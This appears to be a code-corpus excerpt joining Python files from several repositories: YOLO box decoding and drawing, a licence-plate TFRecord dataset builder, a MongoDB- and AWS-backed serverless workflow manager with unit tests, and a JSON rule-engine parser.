return tf.concat([pred_xywh, pred_conf, pred_prob], axis=-1)
@tf.function
def decode_predict(conv_output, scale, output_size, num_classes, strides, xyscale, anchors):
pred_xywh, pred_conf, pred_prob = decode(conv_output, scale, output_size, num_classes, strides, xyscale, anchors)
batch_size = tf.shape(conv_output)[0]
pred_prob = pred_conf * pred_prob
pred_prob = tf.reshape(pred_prob, (batch_size, -1, num_classes))
pred_xywh = tf.reshape(pred_xywh, (batch_size, -1, 4))
return pred_xywh, pred_prob
@tf.function
def filter_bboxes(bboxes, scores, score_threshold, image_size):
scores_max = tf.math.reduce_max(scores, axis=-1)
mask = scores_max >= score_threshold
class_boxes = tf.boolean_mask(bboxes, mask)
pred_conf = tf.boolean_mask(scores, mask)
class_boxes = tf.reshape(class_boxes, [tf.shape(scores)[0], -1, tf.shape(class_boxes)[-1]])
pred_conf = tf.reshape(pred_conf, [tf.shape(scores)[0], -1, tf.shape(pred_conf)[-1]])
box_xy, box_wh = tf.split(class_boxes, (2, 2), axis=-1)
# image_size = tf.cast(image_size, dtype=tf.float32)
box_yx = box_xy[..., ::-1]
box_hw = box_wh[..., ::-1]
box_mins = (box_yx - (box_hw / 2.)) / image_size
box_maxes = (box_yx + (box_hw / 2.)) / image_size
boxes = tf.concat([
box_mins[..., 0:1], # y_min
box_mins[..., 1:2], # x_min
box_maxes[..., 0:1], # y_max
box_maxes[..., 1:2] # x_max
], axis=-1)
return boxes, pred_conf
@tf.function
def bbox_nms(model_output, image_size, max_outputs_per_class=32, max_outputs=32, iou_threshold=0.45, score_threshold=0.25):
pred_bboxes, pred_prob = [],[]
for i in range(3):
output_shape = tf.shape(model_output[i])
conv_output = tf.reshape(model_output[i], (output_shape[0], output_shape[1], output_shape[2], 3, output_shape[3]//3))
bbox, prob = decode_predict(conv_output, i, output_shape[1], 1, [8, 16, 32], [1.2, 1.1, 1.05], [
1.25, 1.625, 2.0, 3.75,
4.125, 2.875, 1.875, 3.8125,
3.875, 2.8125, 3.6875, 7.4375,
3.625, 2.8125, 4.875, 6.1875,
11.65625, 10.1875])
pred_bboxes.append(bbox)
pred_prob.append(prob)
boxes, conf = filter_bboxes(
tf.concat(pred_bboxes, axis=1),
tf.concat(pred_prob, axis=1),
score_threshold,
image_size
)
boxes, scores, classes, valid_detections = tf.image.combined_non_max_suppression(
boxes=tf.reshape(boxes, (tf.shape(boxes)[0], -1, 1, 4)),
scores=tf.reshape(
conf, (tf.shape(conf)[0], -1, tf.shape(conf)[-1])),
max_output_size_per_class=max_outputs_per_class,
max_total_size=max_outputs,
iou_threshold=iou_threshold,
score_threshold=score_threshold
)
return boxes, scores, classes, valid_detections
def draw_bbox(images, model_output, image_size, num_classes, classes=None, show_label=True):
import colorsys
output_images = []
all_boxes, all_scores, all_classes, all_num_boxes = bbox_nms(
model_output,
image_size
)
if not classes:
classes = [str(i) for i in range(num_classes)]
height, width, _ = images[0].shape
hsv_tuples = [(1.0 * x / num_classes, 1., 1.) for x in range(num_classes)]
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
for image, boxes, scores, classes, num_boxes in zip(images, all_boxes, all_scores, all_classes, all_num_boxes):
for j in range(num_boxes):
if int(classes[0][j]) < 0 or int(classes[0][j]) > num_classes: continue
coor = boxes[0][j]
coor[0] = int(coor[0] * height)
coor[2] = int(coor[2] * height)
coor[1] = int(coor[1] * width)
coor[3] = int(coor[3] * width)
fontScale = 0.5
score = scores[0][j]
class_ind = int(classes[0][j])
bbox_color = colors[class_ind]
bbox_thick = int(0.6 * (height + width) / 600)
c1, c2 = (coor[1], coor[0]), (coor[3], coor[2])
cv2.rectangle(image, c1, c2, bbox_color, bbox_thick)
if show_label:
bbox_mess = '%s: %.2f' % (classes[class_ind], score)
t_size = cv2.getTextSize(bbox_mess, 0, fontScale, thickness=bbox_thick // 2)[0]
c3 = (c1[0] + t_size[0], c1[1] - t_size[1] - 3)
cv2.rectangle(image, c1, (np.float32(c3[0]), np.float32(c3[1])), bbox_color, -1) #filled
cv2.putText(image, bbox_mess, (c1[0], np.float32(c1[1] - 2)), cv2.FONT_HERSHEY_SIMPLEX,
fontScale, (0, 0, 0), bbox_thick // 2, lineType=cv2.LINE_AA)
output_images.append(image)
return output_images
```
|
{
"source": "Jex-y/yolov3-tf2",
"score": 2
}
|
#### File: Jex-y/yolov3-tf2/build_dataset.py
```python
import tensorflow as tf
import numpy as np
import os
import io
import hashlib
from PIL import Image
from absl import app, flags, logging
from absl.flags import FLAGS
flags.DEFINE_string("output_path", "data/{}.tfrecord", "Save path for dataset")
flags.DEFINE_string("data_path","raw_data","Path to raw dataset")
flags.DEFINE_float("val_split",0.2,"Split of data to be validated")
flags.DEFINE_integer("seed",0,"Random seed to pick training and validation data")
flags.DEFINE_boolean("verbose",1,"Verbositiy of the output")
def main(_argv):
build(FLAGS.output_path,data_path=FLAGS.data_path,val_split=FLAGS.val_split,seed=FLAGS.seed)
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _bytes_list_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
def _float_list_feature(value):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _int64_list_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def make_example(file,data_path):
with open(data_path + "\\" + file,"r") as f:
data = f.read().split("\n")
xmin, xmax, ymin, ymax, text, label, diff, trunc, view = [], [], [], [], [], [], [], [], []
size = None
for meta in data:
if meta != "":
meta = meta.split("\t")
image_path = meta[0]
if size == None:
image_path = os.path.abspath(data_path + "\\" + image_path)
with tf.io.gfile.GFile(image_path,"rb") as fid:
encoded_jpg = fid.read()
key = hashlib.sha256(encoded_jpg).hexdigest()
encoded_jpg_io = io.BytesIO(encoded_jpg)
img = Image.open(encoded_jpg_io)
width, height = img.size
img.close()
bbox = [float(meta[i]) for i in range(1,5)]
xmin.append(bbox[0] / width)
xmax.append((bbox[0] + bbox[2]) / width)
ymin.append(bbox[1] / height)
ymax.append((bbox[1] + bbox[3]) / height)
text.append("Number Plate".encode("utf8"))
label.append(0)
diff.append(False) # Is object difficult to regocnise e.g. hidden or obstructed
trunc.append(False) # It the object only partial e.g. person from waist up
view.append("back".encode("utf8")) # View of the object e.g. behind or infront
plate = meta[5]
tf_example = tf.train.Example(features=tf.train.Features(feature={
"image/height" : _int64_feature(height),
"image/width" : _int64_feature(width),
"image/filename" : _bytes_feature(image_path.encode("utf8")),
"image/source_id" : _bytes_feature(image_path.encode("utf8")),
"image/key/sha256" : _bytes_feature(key.encode("utf8")),
"image/encoded" : _bytes_feature(encoded_jpg),
"image/format" : _bytes_feature("jpg".encode("utf8")),
"image/object/bbox/xmin" : _float_list_feature(xmin),
"image/object/bbox/xmax" : _float_list_feature(xmax),
"image/object/bbox/ymin" : _float_list_feature(ymin),
"image/object/bbox/ymax" : _float_list_feature(ymax),
"image/object/class/text" : _bytes_list_feature(text),
"image/object/class/label" : _int64_list_feature(label),
"image/object/difficult" : _int64_list_feature(diff),
"image/object/truncated" : _int64_list_feature(trunc),
"image/object/view" : _bytes_list_feature(view)
}))
return tf_example
def build(output_path,data_path,val_split,seed):
np.random.seed(seed)
files = [ x for x in os.listdir(data_path) if x.split(".")[-1] == "txt"]
val = np.random.rand(len(files))
indexes_all = [np.nonzero(val>=val_split)[0],np.nonzero(val<val_split)[0]]
print("Number of train samples: {}\nNumber of validation samples {}\n".format(indexes_all[0].shape[0],indexes_all[1].shape[0]))
count = 0
size = 50
for indexes in indexes_all:
num = indexes.shape[0]
done = 0
writer = tf.io.TFRecordWriter(output_path.format("train" if count == 0 else "val"))
for index in indexes:
tf_example = make_example(files[index],data_path=data_path)
writer.write(tf_example.SerializeToString())
done += 1
ratio = done/num
if FLAGS.verbose > 0:
print("\r{} dataset {:.2f}% Complete\t|{}{}{}|\t".format("training" if count == 0 else "validation",ratio*100,"\u2588"*int(ratio*size),">" if ratio < 1 else "\u2588"," "*int((1-ratio)*size)),end="")
writer.close()
print("")
count += 1
if __name__ == "__main__":
try:
app.run(main)
except SystemExit:
pass
```
|
{
"source": "jeyabalajis/serverless-workflow-manager",
"score": 2
}
|
#### File: serverless-workflow-manager/database/workflow_instance_repository.py
```python
from typing import Dict
from pymongo.database import Database
from entity.workflow import Workflow
from services.config.config_manager import ConfigManager
from services.config.env_util import EnvUtil
from services.database.db_util import DatabaseUtil
from services.utils.dict_util import DictUtil
import logging
import json
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
class WorkflowInstanceRepository:
__TABLE_NAME = "wf_workflow_instance"
__DB_NAME = ConfigManager(EnvUtil.get_env()).get_config("workflow_db")
db: Database = DatabaseUtil(db_name=__DB_NAME).get_db_object()
@classmethod
def find_one_by_business_ref_no(cls, *, business_ref_no: str) -> Workflow:
workflow_instance = cls.db[cls.__TABLE_NAME]
workflow_instance_record = workflow_instance.find_one(
{
"business_ref_no": business_ref_no
},
{
"_id": 0
}
)
return Workflow.from_json(workflow_instance_record)
@classmethod
def upsert(cls, *, workflow: Workflow):
workflow_dict: Dict = workflow.get_dict()
DictUtil.remove_key(workflow_dict, "version")
DictUtil.remove_key(workflow_dict, "updated_at")
wf_workflow_instance: Database = cls.db[cls.__TABLE_NAME]
wf_workflow_instance.find_one_and_update(
{
"business_ref_no": workflow_dict["business_ref_no"]
},
{
"$set": workflow_dict,
"$inc": {"version": 1},
"$currentDate": {"updated_at": {"$type": "date"}}
},
upsert=True)
```
#### File: serverless-workflow-manager/entity/start_workflow_event.py
```python
from typing import Dict
from entity.event import Event
class StartWorkflowEvent(Event):
def __init__(self, *, business_ref_no: str, component_name: str, **kwargs):
super().__init__(business_ref_no=business_ref_no, component_name=component_name, **kwargs)
self._event_type = "StartWorkflow"
@classmethod
def from_json(cls, *, event_json: Dict):
super(StartWorkflowEvent, cls).from_json(event_json=event_json)
```
#### File: serverless-workflow-manager/entity/workflow.py
```python
from typing import Dict, List, Union
from entity.stage import Stage
from entity.task import Task
from exceptions.workflow_type_error import WorkflowTypeError
from exceptions.workflow_value_error import WorkflowValueError
import logging
import json
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
class Workflow:
def __init__(self, *, workflow_name: str, component_name: str, stages: [Stage], **kwargs):
self.workflow_name = workflow_name
self.component_name = component_name
self.stages = stages
self.__validate_stages_type()
self.business_ref_no = None
for key, val in kwargs.items():
setattr(self, key, val)
@classmethod
def from_json(cls, workflow_json: Dict):
if "stages" not in workflow_json:
raise WorkflowValueError("stages node is mandatory")
if not isinstance(workflow_json["stages"], List):
raise WorkflowTypeError("stages node must be a List")
stages = [Stage.from_json(stage_json=stage_json) for stage_json in workflow_json["stages"]]
return Workflow(
workflow_name=workflow_json["workflow_name"],
component_name=workflow_json["component_name"],
stages=stages
)
@classmethod
def from_json_template(cls, workflow_json_template: Dict):
workflow: Workflow = cls.from_json(workflow_json_template)
for (ind, stage) in enumerate(workflow.stages):
if ind == 0:
stage.status = Stage.ACTIVE_STATUS
else:
stage.status = Stage.NOT_STARTED_STATUS
for task in stage.tasks:
task.status = Task.PENDING_STATUS
return workflow
def set_business_ref_no(self, *, business_ref_no: str):
self.business_ref_no = business_ref_no
def get_dict(self):
return json.loads(json.dumps(self, default=lambda o: o.__dict__))
def __validate_stages_type(self):
for stage in self.stages:
if not isinstance(stage, Stage):
raise WorkflowTypeError("all elements of stages must be of type Stage")
def all_dependencies_completed_for_a_task(self, *, stage: Stage, task: Task) -> bool:
if not task.parent_task:
return True
all_parents_completed = True
for parent_task in task.parent_task:
parent_task_record = self.get_task_by_name(stage=stage, task_name=parent_task)
all_parents_completed = all_parents_completed and (parent_task_record.status == Task.COMPLETED_STATUS)
return all_parents_completed
def get_stage_by_name(self, *, stage_name: str) -> [Stage, None]:
for stage in self.stages:
if stage.stage_name == stage_name:
return stage
return None
def get_stage_by_order(self, *, stage_order: int) -> [Stage, None]:
for stage in self.stages:
if stage.stage_order == stage_order:
return stage
return None
def get_active_stage(self) -> Stage:
for stage in self.stages:
if stage.status == Stage.ACTIVE_STATUS:
return stage
def get_task_by_name(self, *, stage: Stage, task_name: str) -> Union[Task, None]:
for workflow_stage in self.stages:
if not workflow_stage.stage_name == stage.stage_name:
continue
for workflow_task in workflow_stage.tasks:
if not workflow_task.task_name == task_name:
continue
return workflow_task
return None
def mark_stage_as_completed(self, *, stage: Stage):
"""
Mark the stage passed in as COMPLETED and ACTIVATE the next stage (if any)
:param stage:
:return:
"""
for workflow_stage in self.stages:
if workflow_stage.stage_name == stage.stage_name:
workflow_stage.status = Stage.COMPLETED_STATUS
next_stage = self.get_stage_by_order(stage_order=workflow_stage.stage_order + 1)
if next_stage is not None:
next_stage.status = Stage.ACTIVE_STATUS
def mark_task_as_completed(self, *, stage: Stage, task: Task):
self.__update_task(stage=stage, task=task, status=Task.COMPLETED_STATUS)
def mark_task_as_pending(self, *, stage: Stage, task: Task):
self.__update_task(stage=stage, task=task, status=Task.PENDING_STATUS)
def mark_task_as_failed(self, *, stage: Stage, task: Task):
self.__update_task(stage=stage, task=task, status=Task.PENDING_STATUS)
def mark_task_as_scheduled(self, *, stage: Stage, task: Task):
self.__update_task(stage=stage, task=task, status=Task.SCHEDULED_STATUS)
def __update_task(self, *, stage: Stage, task: Task, status: str):
for workflow_stage in self.stages:
if workflow_stage.stage_name == stage.stage_name:
for workflow_task in workflow_stage.tasks:
if workflow_task.task_name == task.task_name:
workflow_task.status = status
def schedule_pending_tasks_for_stage(self, *, stage: Stage, pending_tasks: [Task]):
for pending_task in pending_tasks:
if self.all_dependencies_completed_for_a_task(stage=stage, task=pending_task):
self.mark_task_as_scheduled(stage=stage, task=pending_task)
def find_and_schedule_tasks(self):
"""
:return:
The workflow instance is organized as a set of stages & a set of tasks inside each stage.
At any point in time, only one stage is ACTIVE.
Logic:
For the instance, get the current active stage.
if active stage is found
[1] get pending tasks & schedule them, provided their dependencies are completed
if no pending tasks, mark current stage as closed, get the next active stage & repeat [1]
if no active stage, just close the workflow and return
if active stage is not found
this is an instance with no active stage, just close the workflow and return
Please note that the workflow manager DOES NOT WAIT or SLEEP. It reacts based on events.
Upon StartWorkflow message_body, the tasks eligible to be scheduled are scheduled.
When these tasks are marked completed (TaskCompleted), the next set of eligible tasks on the task are scheduled
When there are no more tasks to schedule in a stage, the next stage is activated & the process repeated.
"""
find_tasks = True
while find_tasks:
active_stage = self.get_active_stage()
# If no active stages are found, the whole workflow is done
if active_stage is None:
find_tasks = False
continue
# Get pending tasks for the active stage
pending_tasks = active_stage.get_pending_tasks()
if pending_tasks:
self.schedule_pending_tasks_for_stage(stage=active_stage, pending_tasks=pending_tasks)
find_tasks = False
else:
# If all tasks are completed, mark stage as completed and go to the next stage
if active_stage.all_tasks_completed():
self.mark_stage_as_completed(stage=active_stage)
else:
# Tasks are SCHEDULED and yet to be done.
find_tasks = False
print("done scheduling")
```
#### File: services/database/db_cache.py
```python
from pymongo import MongoClient
class DatabaseCache:
db_cache = {}
@classmethod
def set_db_cache(cls, *, db_name: str, db_connection: MongoClient):
cls.db_cache[db_name] = db_connection
@classmethod
def get_db_cache(cls, *, db_name: str):
if db_name in cls.db_cache:
return cls.db_cache[db_name]
return None
```
#### File: services/secrets/secrets_manager.py
```python
import base64
import boto3
from botocore.exceptions import ClientError
from exceptions.workflow_run_time_error import WorkflowRunTimeError
from services.config.env_util import EnvUtil
class SecretsManager:
SERVICE_NAME = 'secretsmanager'
REGION_NAME = 'ap-south-1'
def __init__(self, *, aws_profile_name: str = None):
self.aws_profile_name = aws_profile_name
self.client = None
self.__init_client_session()
def __init_client_session(self):
if self.aws_profile_name is not None:
aws_profile_name = self.aws_profile_name
else:
aws_profile_name = EnvUtil.get_aws_profile_name()
print("aws profile name: {}".format(aws_profile_name))
if aws_profile_name is None:
session = boto3.session.Session()
else:
session = boto3.session.Session(profile_name=aws_profile_name)
self.client = session.client(
service_name=self.SERVICE_NAME,
region_name=self.REGION_NAME
)
def get_secret(self, *, secret_name: str):
try:
get_secret_value_response = self.client.get_secret_value(
SecretId=secret_name
)
except ClientError as e:
import traceback
raise WorkflowRunTimeError(traceback.format_exc(e))
else:
# Decrypts secret using the associated KMS CMK.
# Depending on whether the secret is a string or binary, one of these fields will be populated.
if 'SecretString' in get_secret_value_response:
secret = get_secret_value_response['SecretString']
return secret
else:
decoded_binary_secret = base64.b64decode(get_secret_value_response['SecretBinary'])
return decoded_binary_secret
```
#### File: services/utils/dict_util.py
```python
from typing import Dict, Any
class DictUtil:
@classmethod
def remove_key(cls, d: Dict, key: Any):
r = dict(d)
if key in r:
del r[key]
return r
```
#### File: jeyabalajis/serverless-workflow-manager/test_workflow.py
```python
import json
from unittest import TestCase
from entity.stage import Stage
from entity.workflow import Workflow
class TestWorkflow(TestCase):
@classmethod
def get_sample_workflow_instance(cls):
with open("./samples/sample_workflow_instance.json") as workflow_instance_file:
return json.load(workflow_instance_file)
def test_all_dependencies_completed_false(self):
workflow_object = Workflow.from_json(workflow_json=self.get_sample_workflow_instance())
stage = workflow_object.get_stage_by_name(stage_name="PREPARE")
task = workflow_object.get_task_by_name(stage=stage, task_name="confirm_delivery")
all_deps_completed = workflow_object.all_dependencies_completed_for_a_task(stage=stage, task=task)
assert all_deps_completed is False
def test_all_dependencies_completed_true(self):
workflow_object = Workflow.from_json(workflow_json=self.get_sample_workflow_instance())
stage = workflow_object.get_stage_by_name(stage_name="ORDER")
task = workflow_object.get_task_by_name(stage=stage, task_name="confirm_order")
all_deps_completed = workflow_object.all_dependencies_completed_for_a_task(stage=stage, task=task)
assert all_deps_completed is True
def test_get_active_stage(self):
workflow_object = Workflow.from_json(workflow_json=self.get_sample_workflow_instance())
active_stage = workflow_object.get_active_stage()
assert active_stage.status == Stage.ACTIVE_STATUS
def test_mark_stage_as_completed(self):
workflow_object = Workflow.from_json(workflow_json=self.get_sample_workflow_instance())
current_active_stage = workflow_object.get_active_stage()
workflow_object.mark_stage_as_completed(stage=current_active_stage)
next_active_stage = workflow_object.get_active_stage()
print("current: {} next: {}".format(current_active_stage.stage_name, next_active_stage.stage_name))
assert next_active_stage.stage_order == current_active_stage.stage_order + 1
assert (
current_active_stage.status == Stage.COMPLETED_STATUS
and next_active_stage.status == Stage.ACTIVE_STATUS
)
workflow_object.mark_stage_as_completed(stage=next_active_stage)
next_next_active_stage = workflow_object.get_active_stage()
assert next_next_active_stage is None
def test_find_and_schedule_tasks(self):
workflow_object = Workflow.from_json(workflow_json=self.get_sample_workflow_instance())
workflow_object.find_and_schedule_tasks()
active_stage = workflow_object.get_active_stage()
pending_tasks = active_stage.get_pending_tasks()
assert pending_tasks is not None and len(pending_tasks) == 1
scheduled_tasks = active_stage.get_scheduled_tasks()
for task in scheduled_tasks:
workflow_object.mark_task_as_completed(stage=active_stage, task=task)
workflow_object.find_and_schedule_tasks()
active_stage = workflow_object.get_active_stage()
pending_tasks = active_stage.get_pending_tasks()
scheduled_tasks = active_stage.get_scheduled_tasks()
assert len(pending_tasks) == 0 and len(scheduled_tasks) == 1
```
|
{
"source": "jeyabalajis/simple-serverless-rule-engine",
"score": 2
}
|
#### File: common/database/db_utils.py
```python
import json
import logging
from pymongo import MongoClient
from common.configure.config import get_config
from common.database import db_cache
from common.secrets_manager import secrets_manager_service
__logger = logging.getLogger(__name__)
def __is_empty(any_structure):
if any_structure:
return False
else:
return True
def init_rule_db(db):
"""
:param db:
:return:
"""
db_cache.set_db_cache("rule_db", db)
def get_db_object(db_name) -> object:
"""
:type db_name: object
:return: pymongo client object
"""
db_handle = db_cache.get_db_cache(db_name)
if not __is_empty(db_handle):
__logger.info("sending db object from cache!")
return db_handle
else:
__logger.info("inside get_db_object with db name as: " + db_name)
db_credentials_id = get_config("db_credentials_id")
db_secrets = secrets_manager_service.get_secret(db_credentials_id)
db_secrets = json.loads(db_secrets)
db_uri = db_secrets["db_url"]
db_username = db_secrets["user_name"]
db_pwd = db_secrets["password"]
client = MongoClient(db_uri, username=db_username, password=db_pwd)
__db_name = get_config(db_name)
db = client[__db_name]
db_cache.set_db_cache(db_name, db)
return db
def get_dict_from_cursor(p_cursor):
"""
:param p_cursor:
:return:
"""
r_dict = {}
if not __is_empty(p_cursor):
r_dict = [doc for doc in p_cursor]
return r_dict
```
#### File: parser/service/rule_parser.py
```python
import logging
import operator
from common.functions import report
from common.configure.config import get_config
from common.database import rule_db_functions as rule_dao
from common.database.db_utils import init_rule_db
__logger = logging.getLogger(__name__)
__recursion_depth = 0
__facts = {}
__operator_mapping = {
"<=": operator.le,
"<": operator.lt,
">=": operator.ge,
">": operator.gt,
"==": operator.eq,
"<>": operator.ne,
"is_none": operator.eq,
"between": "between"
}
__rule_results = {}
def __is_empty(any_structure):
if any_structure:
return False
else:
return True
# Error report gen function
def __report(code, message):
return {"code": code, "message": message}
def __get_func_for_operator(p_operator):
"""
:param operator:
:return:
"""
global __operator_mapping
if p_operator in __operator_mapping:
return __operator_mapping[p_operator]
else:
return None
def __evaluate_numeric(p_value, p_operator, target_value):
"""
:param p_value:
:param p_operator:
:param target_value:
:return:
"""
if p_operator == "is_none":
return p_value is None
else:
try:
operator_func = __get_func_for_operator(p_operator)
if operator_func == "between":
operator_func_gte = __get_func_for_operator(">=")
operator_func_lte = __get_func_for_operator("<=")
return (
operator_func_gte(p_value, target_value["low"])
and
operator_func_lte(p_value, target_value["high"])
)
else:
return operator_func(p_value, target_value)
except:
import traceback
__logger.error("Unhandled exception while evaluating numeric!!!")
__logger.error(traceback.format_exc())
return False
def __evaluate_string(p_value, p_operator, target_value):
"""
:param p_value:
:param p_operator:
:param target_value:
:return:
"""
if p_operator == "in_list":
if p_value in target_value:
return True
else:
return False
if p_operator == "contains":
if target_value in p_value:
return True
else:
return False
if p_operator == "is_none":
if target_value == p_value:
return True
else:
return False
if p_operator == "equals":
if target_value == p_value:
return True
else:
return False
def __parse_and_execute_token(rule_antecedent, eval_parameter):
"""
:rtype: object
:param rule_antecedent:
:return:
"""
# __logger.info("token name: " + rule_antecedent["token_name"])
# __logger.info("token type: " + rule_antecedent["token_type"])
# __logger.info("token caty: " + rule_antecedent["token_category"])
# __logger.info("operator: " + rule_antecedent["operator"])
if rule_antecedent["token_type"] == "numeric":
if "eval_value" not in rule_antecedent:
rule_antecedent["eval_value"] = None
# __logger.info("evaluation vale: " + str(rule_antecedent["eval_value"]))
return __evaluate_numeric(eval_parameter, rule_antecedent["operator"], rule_antecedent["eval_value"])
if rule_antecedent["token_type"] == "string":
if "eval_value" not in rule_antecedent:
rule_antecedent["eval_value"] = None
return __evaluate_string(eval_parameter, rule_antecedent["operator"], rule_antecedent["eval_value"])
def __evaluate_token(rule_antecedent):
"""
:param rule_antecedent:
:return:
"""
if "token_category" in rule_antecedent and "token_type" in rule_antecedent:
if rule_antecedent["token_category"] == "organic":
global __facts
if rule_antecedent["token_name"] in __facts:
# global __facts
rule_antecedent["token_value"] = __facts[rule_antecedent["token_name"]]
token_result = __parse_and_execute_token(rule_antecedent, __facts[rule_antecedent["token_name"]])
rule_antecedent["token_result"] = token_result
return token_result
else:
return False
if rule_antecedent["token_category"] == 'inorganic':
child_rule_lexicon = rule_dao.get_a_rule(rule_antecedent["child_rule_name"])
child_rule_score = __compute_score(child_rule_lexicon)
token_result = __parse_and_execute_token(rule_antecedent, child_rule_score)
rule_antecedent["token_result"] = token_result
return token_result
else:
return False
def __evaluate_rule_antecedent(rule_antecedent, condition):
"""
:param rule_antecedent:
:param condition:
:return:
"""
global __recursion_depth
__recursion_depth = __recursion_depth + 1
_max_recursion_depth = get_config('max_recursion_depth')
if not __is_empty(_max_recursion_depth):
_max_recursion_depth = 5
if __recursion_depth > _max_recursion_depth:
return False
truth = True
# in when_any, any one constituent has to be true
if condition == "@when_any":
truth = False
# in when_all, every constituent has to be true
if condition == "@when_all":
truth = True
rule_antecedents = []
if type(rule_antecedent).__name__ == 'dict':
rule_antecedents.append(rule_antecedent)
if type(rule_antecedent).__name__ == 'list':
rule_antecedents = rule_antecedent
for constituent in rule_antecedents:
if "@when_all" in constituent:
constituent_result = __evaluate_rule_antecedent(constituent["@when_all"], "@when_all")
if "@when_any" in constituent:
constituent_result = __evaluate_rule_antecedent(constituent["@when_any"], "@when_any")
if "token_name" in constituent:
# __logger.info("single token case. evaluate token")
constituent_result = __evaluate_token(constituent)
if condition == "@when_any":
truth = truth or constituent_result
if condition == "@when_all":
truth = truth and constituent_result
return truth
def __evaluate_rule_set(rule_name, rule_set, parent):
"""
:param rule_name:
:param rule_set:
:param parent:
:return:
"""
rule_set_result = {
"set_name": rule_set["set_name"],
"weight": rule_set["weight"],
"rule_rows": []
}
weighted_score = 0
if "rule_rows" in rule_set:
unweighted_score = 0
for rule_row in rule_set["rule_rows"]:
global __recursion_depth
__recursion_depth = 0
rule_row_result = False
if "antecedent" in rule_row:
rule_row_result = __evaluate_rule_antecedent(rule_row["antecedent"], "@when_all")
if rule_row_result:
unweighted_score = rule_row["consequent"]["score"]
rule_row["evaluated"] = True
rule_set_result["rule_rows"].append(rule_row)
break
else:
rule_row["evaluated"] = False
rule_set_result["rule_rows"].append(rule_row)
weighted_score = unweighted_score * rule_set["weight"]
rule_set_result["unweighted_score"] = unweighted_score
rule_set_result["weighted_score"] = weighted_score
if parent:
__assign_rule_set_to_results(rule_set_result)
else:
rule_set_result_wrapper = dict(rule_name=rule_name, rule_results=rule_set_result)
__assign_rule_set_to_results(rule_set_result_wrapper)
return weighted_score
def __evaluate_rule_decision_set(rule_name, rule_set, parent):
"""
:param rule_name:
:param rule_set:
:param parent:
:return:
"""
rule_set_result = {
"set_name": rule_set["set_name"],
"rule_rows": []
}
decision = 'none'
if "rule_rows" in rule_set:
for rule_row in rule_set["rule_rows"]:
global __recursion_depth
__recursion_depth = 0
rule_row_result = False
if "antecedent" in rule_row:
rule_row_result = __evaluate_rule_antecedent(rule_row["antecedent"], "@when_all")
if rule_row_result:
# __logger.info("This rule row has evaluated as true!!! returning consequent")
decision = rule_row["consequent"]["decision"]
rule_row["evaluated"] = True
rule_set_result["rule_rows"].append(rule_row)
break
else:
# __logger.info("This rule row has evaluated as false :( continue evaluating the next row")
rule_row["evaluated"] = False
rule_set_result["rule_rows"].append(rule_row)
rule_set_result["decision"] = decision
if parent:
__assign_rule_set_to_results(rule_set_result)
else:
rule_set_result_wrapper = dict(rule_name=rule_name, rule_results=rule_set_result)
__assign_rule_set_to_results(rule_set_result_wrapper)
return decision
def __compute_score(rule_lexicon, parent, depth):
"""
:param rule_lexicon:
:return:
"""
total_score = 0
if "rule_set" in rule_lexicon:
for rule_set in rule_lexicon["rule_set"]:
score = 0
unweighted_score = 0
if "rule_set_type" in rule_set:
if rule_set["rule_set_type"] == 'evaluate':
score = __evaluate_rule_set(rule_lexicon["rule_name"], rule_set, parent)
if rule_set["rule_set_type"] == 'compute':
child_rule_lexicon = rule_dao.get_a_rule(rule_set["rule_name"])
if __is_empty(child_rule_lexicon):
score = 0
unweighted_score = 0
else:
unweighted_score = __compute_score(child_rule_lexicon, False, depth + 1)
score = unweighted_score * rule_set["weight"]
child_rule_result = dict(rule_name=child_rule_lexicon["rule_name"], weighted_score=score,
unweighted_score=unweighted_score, depth=depth + 1)
__assign_child_rule_to_results(child_rule_result)
total_score = total_score + score
return total_score
def __get_decision(rule_lexicon, parent):
"""
:param rule_lexicon:
:return:
"""
decision = 'none'
if "rule_set" in rule_lexicon:
rule_set = rule_lexicon["rule_set"]
decision = __evaluate_rule_decision_set(rule_lexicon["rule_name"], rule_set, parent)
return decision
def __assign_rule_set_to_results(rule_set):
"""
:param rule_set:
:return:
"""
global __rule_results
__rule_results["result_set"].append(rule_set)
def __assign_child_rule_to_results(child_rule_results):
"""
:param rule_set:
:return:
"""
global __rule_results
__rule_results["child_rules"].append(child_rule_results)
def __populate_rule_results(tag, value):
"""
:param tag:
:param value:
:return:
"""
global __rule_results
__rule_results[tag] = value
def __init_rule_results(rule_lexicon):
"""
:param rule_lexicon:
:return:
"""
global __rule_results
__rule_results = {
"rule_name": rule_lexicon["rule_name"],
"rule_description": rule_lexicon["rule_description"],
"rule_type": rule_lexicon["rule_type"],
"result_set": [],
"child_rules": []
}
def execute_rule(rule_name, p_facts):
"""
:param db:
:param p_facts:
:param rule_name:
:return:
"""
if __is_empty(rule_name):
__logger.error("rule name is mandatory!")
return report(1, "Rule name is mandatory")
if __is_empty(p_facts):
__logger.error("facts are mandatory!")
return report(1, "facts node is mandatory")
# if __is_empty(db):
# __logger.error("db handle mandatory!")
# return report(1, "database handle is mandatory")
#
# init_rule_db(db)
global __facts
__facts = p_facts
rule_lexicon = rule_dao.get_a_rule(rule_name)
if __is_empty(rule_lexicon):
return report(1, "Rule does not exist")
if "rule_type" in rule_lexicon:
try:
__init_rule_results(rule_lexicon)
if rule_lexicon["rule_type"] == "score":
__logger.info("calling compute score function")
total_score = __compute_score(rule_lexicon, True, 0)
__logger.info("$$$$$TOTAL SCORE$$$$$" + str(total_score))
__populate_rule_results('final_score', total_score)
if rule_lexicon["rule_type"] == "decision":
__logger.info("calling get decision function")
decision = __get_decision(rule_lexicon, True)
__logger.info("$$$$$FINAL DECISION$$$$$" + str(decision))
__populate_rule_results('final_decision', decision)
except:
import traceback
__logger.error(traceback.format_exc())
return report(1, traceback.format_exc())
else:
__logger.error("Rule type is not set for this rule")
return report(1, "Rule Type is not configured for this rule")
return report(0, __rule_results)
```
|
{
"source": "jeyabbalas/mutational-signatures-data",
"score": 3
}
|
#### File: mutational-signatures-data/lib/icgc.py
```python
